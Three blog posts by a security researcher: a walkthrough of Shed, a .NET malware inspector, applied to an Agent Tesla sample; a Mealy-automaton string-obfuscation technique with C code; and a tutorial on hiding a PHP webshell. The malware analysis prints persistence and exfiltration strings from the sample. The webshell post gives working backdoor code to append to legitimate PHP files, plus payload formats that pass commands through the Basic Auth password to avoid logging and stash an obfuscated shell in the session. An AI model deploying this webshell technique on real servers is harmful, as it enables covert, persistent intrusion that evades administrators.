domenica 12 novembre 2017

Shed - Inspect .NET malware like a Sir

When I start to analyze a new malware, there are some initial tasks that provide a lot of useful information to speedup the analysis. Two of them are of particular interest, the extraction of the embedded strings and the dumping of packed binaries. Unfortunately those information are often obfuscated or not so easy to retrieve. In this article I'll present a new tool which is able to analyze .NET programs in order to extract those information in an easy way. Its name is Shed.

You can find the full source code of the project and an already compiled binary in this Github project.

Introduction

The idea behind this tool is to make the extraction of strings that reside in memory easier and also to dump dynamically loaded binaries. I'll show you how to use Shed in order to analyze a well know .NET RAT malware.

Dump the Heap

When a new object is created, it is saved in the managed heap. This memory area is managed by the .NET runtime, more specifically by the Garbage Collector. It is its responsibility to free unused memory when needed. This specific behavior is very handy for an analyst, since the Garbage Collector will not reclaim the memory if not necessary. In this way we have a good amount of time to inspect the heap and to dump useful objects, like strings or byte array.

Thanks to the powerful Reflection capability provided by .NET, for each stored object we can extract the type and also all associated fields. In this way we can reconstruct the memory representation of complex class that can provide useful insight about the inner working of the malware.

Modules dump

Another interesting aspect when analyzing a malware is the ability to dump dynamically loaded Assemblies. This case is pretty common, since most of the .NET malware store the main Assembly in some kind of encrypted form and load it only at runtime.

It already exists a very useful tool that allow you to dump dynamically loaded Assemblies which is MegaDumper, but since it is not open source (on GitHub you can find a decompiled version) and I have never wrote a PE dumper, I decided to create my own tool :)

In order to dump an Assembly we have to dump the related PE file from memory. This operation can be pretty challenging, a lot depends on how the malware was protected.

A naive approach is identifying the start of the PE file and starting from there read

PE->SizeOfImage

bytes. The main problem with this approach is that by now most of the malware use Process Hollowing ([1]) to inject its content in a newly created process. This implies that the PE is not mapped in a contiguous memory area, making the read operation not possible.

A better strategy is to parse the PE header and reconstruct the binary by reading all sections from memory.

One important aspect to consider when dump a .NET Assembly is to fix the PE Entry Point. Let us analyze the Entry Point of a managed PE file:
[0x0043d9de]> pd 1
;-- entry0:
0x0043d9de    ff2500204000   jmp dword [sym.imp.mscoree.dll__CorExe
the code jumps to the _CorExe routine. From MSDN ([2]) we can read that:

Initializes the common language runtime (CLR), locates the managed entry point in the executable assembly's CLR header, and begins execution.

So we need to set the Entry Point of the reconstructed binary to a piece of code which jump to this function. Last missing part is to obtain the address of this function. This task can be accomplished by walking the Import Address Table and locating it.

Use cases Agent Tesla (cc518a6c63f56c4891b5e30e8cb97b26)

Let's see how to use Shed in order to analyze a real world malware, an agent Tesla sample analyzed by Forcepoint in [3].

c:\Shed>Shed.exe --timeout 2000 --exe cc518a6c63f56c4891b5e30e8cb97b26.exe
    -=[ Shed .NET program inspector ]=-
Copyright (c) 2017 Antonio Parata - @s4tan

[+] Attached to pid: 160
[+] Created runtime: v2.0.50727.5420
...
[+] [System.String] 0x278043C: 0|0|0|0|0|0|0|0|0|0|18000|1|skpehostbrowaer.exe|Temp|AXKTOimGsklqIffPCompzbSmVnpwanUmzyjRJTSpqQzJHIASyqoYDvKR|0|0|0|0|0|0|0|IWIOzYrGb|0|0|0|0|0|0|NgjBaJMqu|OEeQOTHIoxSSUapGpFWjxLNzWbe|6|0|
[+] [System.String] 0x2780610: /c echo [zoneTransfer]ZoneID = 2 > 
[+] [System.String] 0x2780668: :ZONE.identifier & exit
[+] [System.String] 0x2780748: <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">  <RegistrationInfo>    <Date>2014-10-25T14:27:44.8929027</Date>    <Author>[USERID]</Author>  </RegistrationInfo>  <Triggers>    <LogonTrigger>      <Enabled>true</Enabled>      <UserId>[USERID]</UserId>    </LogonTrigger>    <RegistrationTrigger>      <Enabled>false</Enabled>    </RegistrationTrigger>  </Triggers>  <Principals>    <Principal id="Author">      <UserId>[USERID]</UserId>      <LogonType>InteractiveToken</LogonType>      <RunLevel>LeastPrivilege</RunLevel>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>    <AllowHardTerminate>false</AllowHardTerminate>    <StartWhenAvailable>true</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <StopOnIdleEnd>true</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>7</Priority>  </Settings>  <Actions Context="Author">    <Exec>      <Command>[LOCATION]</Command>    </Exec>  </Actions></Task>
[+] [System.String] 0x2781308: [LOCATION]
[+] [System.String] 0x2781330: schtasks.exe

...
[+] Saved dynamic module: raobtmNqCzJjZpcUiyDwYSCM
[+] Saved dynamic module: Microsoft.VisualBasic.dll
[+] Result saved to c:\Shed\Result\160
[+] Detached
From the output we can see that a module with a weird name (raobtmNqCzJjZpcUiyDwYSCM) was dumped. This Assembly was decrypted and loaded by the first loader layer.

It is in charge for various operations and it has also a configuration string which is:

0|0|0|0|0|0|0|0|0|0|18000|1|skpehostbrowaer.exe|Temp|AXKTOimGsklqIffPCompzbSmVnpwanUmzyjRJTSpqQzJHIASyqoYDvKR|0|0|0|0|0|0|0|IWIOzYrGb|0|0|0|0|0|0|NgjBaJMqu|OEeQOTHIoxSSUapGpFWjxLNzWbe|6|0|

specify the time to sleep (18000 milliseconds) and the name to give to the real payload.

Also, it is in charge for ensuring persistence by creating a task with the XML configuration string displayed in the output. Finally, it decrypts the real payload and executes it with a .NET implementation of the RunPE technique which use Process Hollow.

This loader was already analyzed in [4]. By using Shed, we can see that we were able to retrieve a lot of useful information without too much effort.

Moving on, in order to inspect the real payload, I executed the program and waited for the spawn of a new process. After this, I ran Shed against the newly created process as showed below:
c:\Shed>Shed.exe --pid 3652
    -=[ Shed .NET program inspector ]=-
Copyright (c) 2017 Antonio Parata - @s4tan

[+] Attached to pid: 3652
[+] Created runtime: v2.0.50727.5420
...
[+] [System.String] 0x297A798: <br>VideocardName&nbsp;: 
[+] [System.String] 0x297A7DC: <br>VideocardMem&nbsp;&nbsp;: 
[+] [System.String] 0x297A82C: <br>IP Address&nbsp;&nbsp;:
...
[+] Saved dynamic module: Microsoft.VisualBasic.dll
[+] Saved dynamic module: Microsoft.JScript.dll
[+] Saved dynamic module: IELibrary
[+] Saved dynamic module: System.Security.dll
[+] Result saved to c:\Shed\Result\3652
[+] Detached
This time the output is pretty huge. Among the dumped modules the most interesting ones are:

IELibray (9759067EDF26E4A4E49B4E228C7DF81C)

It is used to interact with Internet Explorer in order to steal usernames, passwords and cookies, as can be seen by the following image:

no name (6030C0CFC40A6A69857454D5EB41D9FA)

This is the real Agent Tesla module, where we can see the routine in charge for decrypting the stored string:


Heap inspection

As already said, even if the strings are stored in encrypted form they will survive until the Garbage Collector will not reclaim the memory. If we take a look at the JSON file heap.json, we will see (apart from the enormous amount of information dumped) a lot of useful data, like the SMTP server and account used to exfiltrate data:

{
  "Address": 43845700,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "gp4XXXXXX@zoho.com"
},
...
{
  "Address": 43864368,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "poXXXXX8"
},
...
{
  "Address": 43871204,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "smtp.zoho.com"
},
...

Conclusion

I hope that you enjoyed this post and that you will find Shed useful in your analysis :)

References

[1] Process Hollowing
[2] _CorExeMain Function
[3] PART TWO - CAMOUFLAGE .NETTING
[4] Unpacking yet another .NET crypter

sabato 16 settembre 2017

Using a Mealy automata for string obfuscation

Obfuscating string is a very important aspect if you want to protect sensitive information. In the following post I'll present an alternative method to obfuscate strings by using a Mealy automata.

You can find the full source code of the project in this Github project

Introduction

From Wikipedia ([1]) we can read that a Mealy machine is a finite-state machine whose output values are determined both by its current state and the current inputs. There are plenty of information on the internet about this concept, so I will not go into further details. What is interesting to us is that by having an automata, we can give it a specific input and have the computed string as output.

The idea of using a Mealy machine to obfuscate strings is not new and it was already presented in [2]. Unfortunately the book doesn't explains how to create a Mealy automata in an automatic way. As the task of creating an automata manually, for each of the strings, is very time consuming, I felt that a very important part was missing.
In the following paragraphs I'll try to fill this hole by providing you with a possible implementation.
In the final section we will see an example that uses the code presented in the book.

Why using a new method?

If you have ever reversed a binary which use obfuscation you might have noticed that most of the obfuscation strategies are based on using some kind of know cryptographic algorithm or by using a custom encoder based on ADD/XOR/ROL instructions. Both cases have advantages and disadvantage (using a XOR obfuscation is a weak method, see [3]), but both are based on the assumption that they have the data encoded/encrypted in some way in the binary. In our case we convert the data in "code" that generates the decoded value at runtime.

For our purpose we will use a Mealy machine which has 0/1 as input. This choice will allow us to encode each letter with a bit, greatly reducing the input representation.

Implementation

Let's consider a simple automata (created with [4]):


On each arrow there is the input and the associated output. If we consider the state 0 as the initial one and pass the input string: 0 1 1 0 1 0 0 we will receive as output the string ANTONIA.

In order to automatically generates the automata I found that starting by considering the input was a pretty challenging task. So I changed strategy and considered the output in order to create the automata. For each character, the choice is between creating a new state, or connecting to one of the already existing states. You can find the full F# source code implementation with a test example here.

Testing

Now that we have an algorithm to generate the automata, let's try to obfuscate some strings. Since the implementation was done in F# I'll create an helper method to print the automata in an handy way in order to import the result in a C program. Let's consider the string supersecretpassword. The automata and the input generated from this string are (the result may be different on your machine):
Input text: supersecretpassword

Input: 1,1,0,0,0,1,0,0,0,0,1,0,1,0,1,1,1,1,0, Int: 250915

Output: {{'e', 's'}, {'e', 'u'}, {'p', 'e'}, {'e', 'a'}, 
        {'r', 'r'}, {'c', 'w'}, {'d', 't'}, {'s', 'd'}, 
        {'u', 's'}, {'p', 'w'}, {'a', 'o'}, {'d', 's'}, 
        {'s', 'p'}}

Automata: {{6, 1}, {5, 2}, {3, 2}, {4, 7}, {0, 11}, {4, 12}, 
          {12, 2}, {8, 4}, {12, 9}, {0, 10}, {6, 4}, {12, 7}, 
          {11, 10}}


Since the length of the string is less than 32 characters, we can convert the binary input into a DWORD. Now let's write a C program that reconstruct the given string:

#include "stdafx.h"

void deobfuscate(char* text, int length, int key, char automata[][2], char output[][2])
{
 int v = 0, state = 0, i = 0;
 for (i = 0; i < length; i++)
 {
  v = key & 1;
  key >>= 1;
  text[i] = output[state][v];
  state = automata[state][v];
 }
 text[i] = '\0';
}


int main()
{
 char text[20];
 int key = 250915;

 char automata[][2] =
 { { 6, 1 },{ 5, 2 },{ 3, 2 },{ 4, 7 },{ 0, 11 },
 { 4, 12 },{ 12, 2 },{ 8, 4 },{ 12, 9 },{ 0, 10 },
 { 6, 4 },{ 12, 7 },{ 11, 10 } };

 char output[][2] =
 { { 'e', 's' },{ 'e', 'u' },{ 'p', 'e' },{ 'e', 'a' },
 { 'r', 'r' },{ 'c', 'w' },{ 'd', 't' },{ 's', 'd' },
 { 'u', 's' },{ 'p', 'w' },{ 'a', 'o' },{ 'd', 's' },
 { 's', 'p' } };

 deobfuscate(text, sizeof(text)-1, key, automata, output);

 printf("Output: %s", text);
 return 0;
}


If we run this code we can see that the string "supersecretpassword" will be displayed in the console :)

Conclusion

I hope that you enjoyed this post as much as I enjoyed to write the code. If you find any errors or you know a better algorithm to implement the Mealy automata just leave a comment or drop me an email ;)

References

[1] Mealy machine
[2] Surreptitious Software: Obfuscation, Watermarking, and Tamperproofing for Software Protection
[3] XORSearch & XORStrings
[4] Finite State Machine Designer

domenica 14 maggio 2017

Hiding PHP Webshell in an effective way

There are many reason why you want to hide your PHP Webshell, for example not being caught by the system administrator during a penetration testing activity. In this post I'll propose a possible approach on how to do it.

Let's consider this scenario:
  • you are able to create a PHP file in the web root of the web server (for example by exploiting an arbitrary file upload, a RCE and so on...)
  • you want to use a shell that is a bit more complete than: eval($_GET['c'])
  • you want to be as stealth as possible (speaking of both artifacts left on the filesystem and at a network level)
The first step is the creation of the PHP file that will accept our input. This file should be very small and possibly with no direct reference to code execution functions. Sucuri wrote some blog posts about possible ways to execute PHP code in an unusual way ([1], [2]), but in my opinion there is a clever way to execute PHP code by using "Variable functions" ([3], [4]).

This idea is pretty simple, let us see an example:
$fun = 'strrev';
print $fun('Hello');
The result will be: olleH

Cool, so we can create something like:
$f = $_GET['c'];
$f($_GET['p']);
and we can pass as c = eval and as p = <my evil code>. Unfortunately it will not work :\ From the Variable functions page we can read:

"Variable functions won't work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. Use wrapper functions to employ any of these constructs as variable functions."

Among the excluded functions there is also eval :( Ok, not too bad, if you know PHP, you will also know that there is the assert function that has a very similar behavior to eval and it is allowed :)

So, now we have a very simple PHP code that can execute arbitrary code with a very minimal footprint. The best choice would be to alter a legit .PHP file and append our short code to it, in this way no new files will be created on the file system. Now, our second concern is to cover our network trace.

To do this, we can opt for the GET method and pass the data via query string. This is probably the worst option since the query string is logged by default in the log web server.

As an alternative we can use the POST method for our communication, but if you have added the PHP code to a legit page that doesn't accept POST data, this could look suspicious and raise the attention of the administrator. Also in a log file the POST requests are considerably less that the GET requests, this fact can be spotted easily by a system administrator.

We should find something that is considered a bad practice to be logged, something that, if implemented, could be classified as the CWE-532: Information Exposure Through Log Files. Yes, you got it, we will use a password field :) To be more precise the HTTP Basic Authorization Header. This value is also encoded in base64 and can be accessed from PHP without any need to do a decode first. So, in the end our code will be something like:
<?php

 if (isset($_SERVER['PHP_AUTH_PW'])) 
 {
  $a = explode("|", $_SERVER['PHP_AUTH_PW']); 
  @$a[0]($a[1]);
 }

?>
Now we need just one last step, the code that we want to execute should be user-friendlier than just that raw shell but we don't want to store it in a separate file in the web root, we need to find another place to store it and that can be easily accessed by PHP.

The perfect solution seems to be the SESSION object. This object is typically serialized in a file in the temp directory (as default configuration), so it is very unlikely that a system administrator takes a look at those files for no reason.

Let's have a brief recap:
  1. we have a very short and simple PHP code, possibly embedded inside a legit PHP file
  2. we will use the Autorization header to communicate with our code, this will avoid to have our data logged
  3. we will store the big PHP shell in the user session in order to be called later
Let's suppose that $webshell is the content that we want to store in the user session (a shell C99 style). Our first request will store the code in the user session. We will send as HTTP Basic password the following content:
  0                  1                     2                3
assert|eval(base64_decode(INSTALLER))|SESSION_KEY|base64(PHP_SHELLCODE)
The request will call the assert function (0), which in turn will call the eval function (1) (this is done to overcome the Variable Functions limitation) on a base64 decoded string (INSTALLER) which has this content:
session_start();
$a = explode("|", $_SERVER['PHP_AUTH_PW']);
$_SESSION[$a[2]] = $a[3];
This code just extracts the session key name from the data (2), the base64 encoded PHP web shell (3) (the content of $webshell) and save it in the user session. Now we have a PHP webshell in our session that is just waiting to be invoked :)

We can do this by sending the following data:
assert|eval(base64_decode(INVOKE))
where the content of INVOKE is:
session_start();
if (array_key_exists("SESSION_KEY", $_SESSION))
{
    function xor_deobf($str, $key)
    {
       $out = '';
       for($i = 0; $i < strlen($str); ++$i)
          $out .= ($str[$i] ^ $key[$i % strlen($key)]);
       return $out;
    }
    eval(xor_deobf(base64_decode($_SESSION["SESSION_KEY"]), "MY_HARCODED_KEY"));
}
Basically it verifies that the given SESSION_KEY is present and if so its content is executed. I have used a simple XOR obfuscation layer to be even more stealthy.

Of course, $webshell should also use the same communication channel in order to be stealth, otherwise you will loose your benefit :)

Conclusion

I hope that you have found this simple post useful. I created a simple python script that it is able to communicate with my code and execute commands.

You can find it at: https://gist.github.com/enkomio/c6db9cb690bbeac1476fb3e56bf7c1a4

You can invoke it with the following command:
phquirk.py http://www.example.com/legit_file_with_my_code.php "print 'Hello from my web shell';"
The result is:
[+] Using session value: PHPSESSID=d22838ce1683e0c9f7f634b10b
[+] Encryption key: d51313ea1fd9233dfe8c40eacfde35e7290aaec8533cc0dd78
[+] Saved command in user session
[+] Command result: Hello from my web shell

References

[1] PHP Backdoors: Hidden With Clever Use of Extract Function - https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

[2] PHP Callback Functions: Another Way to Hide Backdoors - https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html

[3] Variable functions - http://php.net/manual/en/functions.variable-functions.php

[4] A Look Into Creating A Truley Invisible PHP Shell - https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell/